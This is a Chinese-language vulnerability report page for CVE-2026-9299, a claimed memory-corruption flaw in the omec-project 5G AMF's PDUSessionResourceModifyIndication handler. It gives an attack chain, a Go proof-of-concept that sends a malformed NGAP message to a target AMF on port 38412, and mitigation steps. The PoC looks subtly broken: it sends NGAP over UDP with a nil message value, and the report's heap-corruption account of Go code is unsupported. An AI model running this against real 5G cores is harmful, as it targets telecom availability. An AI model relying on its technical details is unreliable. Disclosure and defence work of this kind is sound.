IPBUF安全漏洞报告
English
CVE-2026-9299 CVSS 6.3 中危

CVE-2026-9299 omec-project amf PDUSessionResourceModifyIndication内存损坏漏洞

披露日期: 2026-05-23

漏洞信息

漏洞编号
CVE-2026-9299
漏洞类型
内存损坏
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
omec-project amf

相关标签

内存损坏5G核心网omec-projectAMFNGAP协议PDUSessionResourceModifyIndicationCVE-2026-9299

漏洞概述

CVE-2026-9299是存在于omec-project AMF(Access and Mobility Management Function,接入和移动性管理功能)组件中的一个内存损坏漏洞。AMF是5G核心网的关键网元,负责处理用户的接入和移动性管理功能。该漏洞存在于/go/src/amf/ngap/handler.go文件中的PDUSessionResourceModifyIndication函数中,攻击者可以通过构造特殊的NGAP协议消息触发内存损坏问题。由于该漏洞可通过网络远程利用,且不需要高权限认证,因此对5G核心网的安全性构成严重威胁。攻击者利用该漏洞可能导致服务中断、信息泄露或进一步的攻击。OMEC(Open Mobile Evolved Core)是一个开源的5G核心网项目,被广泛应用于电信运营商的网络测试和部署环境中。该漏洞已被公开披露并可能被恶意利用,建议相关用户立即采取修复措施。

技术细节

该漏洞位于omec-project AMF的NGAP(N2 Interface Application Protocol)处理模块中,具体在PDUSessionResourceModifyIndication函数中。NGAP协议用于AMF与gNB(下一代基站)之间的通信,处理用户的PDU会话资源管理。当AMF接收到来自gNB的PDUSessionResourceModifyIndication消息时,由于缺乏适当的输入验证和内存管理,攻击者可以构造包含异常参数的恶意消息,导致堆内存损坏。攻击者可以通过发送精心构造的NGAP消息,触发缓冲区溢出或释放后使用等内存损坏问题,成功利用后可导致AMF服务崩溃或执行任意代码。由于AMF是5G核心网的关键组件,该漏洞的利用可能影响整个5G网络的可用性和安全性。漏洞存在于AMF处理PDU会话修改指示的逻辑中,涉及内存分配和释放的不当处理。

攻击链分析

STEP 1
步骤1
信息收集:攻击者首先识别运行omec-project AMF的目标服务器,确定其IP地址和N2接口端口(通常38412)
STEP 2
步骤2
构造恶意数据包:攻击者构造包含异常参数的NGAP PDUSessionResourceModifyIndication消息,故意注入超出预期范围的数值或格式错误的数据
STEP 3
步骤3
发送恶意请求:通过UDP协议向AMF的N2接口发送精心构造的恶意NGAP消息,触发PDUSessionResourceModifyIndication函数中的内存损坏
STEP 4
步骤4
触发漏洞:AMF处理恶意消息时,由于缺乏输入验证,导致堆内存损坏,可能触发缓冲区溢出或释放后使用等安全问题
STEP 5
步骤5
利用后果:成功利用后可能导致AMF服务崩溃(DoS)、内存信息泄露或潜在远程代码执行,影响5G核心网的可用性和安全性

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2026-9299 PoC - PDUSessionResourceModifyIndication Memory Corruption // This PoC demonstrates sending malicious NGAP PDUSessionResourceModifyIndication message package main import ( "fmt" "net" "github.com/omec-project/ngap" "github.com/omec-project/ngap/ngapType" ) func createMaliciousPDUSessionResourceModifyIndication() (*ngap.NGAPPDU, error) { // Create NGAP PDU for PDUSessionResourceModifyIndication pdu := &ngap.NGAPPDU{ InitiatingMessage: &ngapType.InitiatingMessage{ ProcedureCode: ngapType.ProcedureCodePDUSessionResourceModifyIndication, Criticality: ngapType.CriticalityReject, Value: nil, // Malformed data causing memory corruption }, } return pdu, nil } func sendMaliciousPacket(targetIP string, targetPort int) error { conn, err := net.DialUDP("udp", nil, &net.UDPAddr{ IP: net.ParseIP(targetIP), Port: targetPort, }) if err != nil { return err } defer conn.Close() pdu, err := createMaliciousPDUSessionResourceModifyIndication() if err != nil { return err } // Encode and send the malicious NGAP message data, err := ngap.Encoder(pdu) if err != nil { return err } _, err = conn.Write(data) return err } func main() { targetIP := "<AMF_IP>" targetPort := 38412 // Standard NGAP port fmt.Println("Sending malicious PDUSessionResourceModifyIndication...") if err := sendMaliciousPacket(targetIP, targetPort); err != nil { fmt.Printf("Error: %v\n", err) } else { fmt.Println("Malicious packet sent successfully") } } // Usage: // 1. Replace <AMF_IP> with target AMF server IP // 2. Ensure network connectivity to AMF N2 interface // 3. Run: go run poc.go

影响范围

omec-project amf <= 2.1.1

防御指南

临时缓解措施
在官方补丁发布前,建议采取以下临时缓解措施:1)通过网络分段隔离5G核心网组件,限制对AMF N2接口的访问;2)配置防火墙规则,只允许可信gNB的IP地址连接AMF;3)部署异常流量检测系统,识别和阻断异常的NGAP消息;4)定期监控AMF进程状态,发现异常立即告警;5)准备应急预案,确保在漏洞被利用时能够快速响应和恢复服务。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表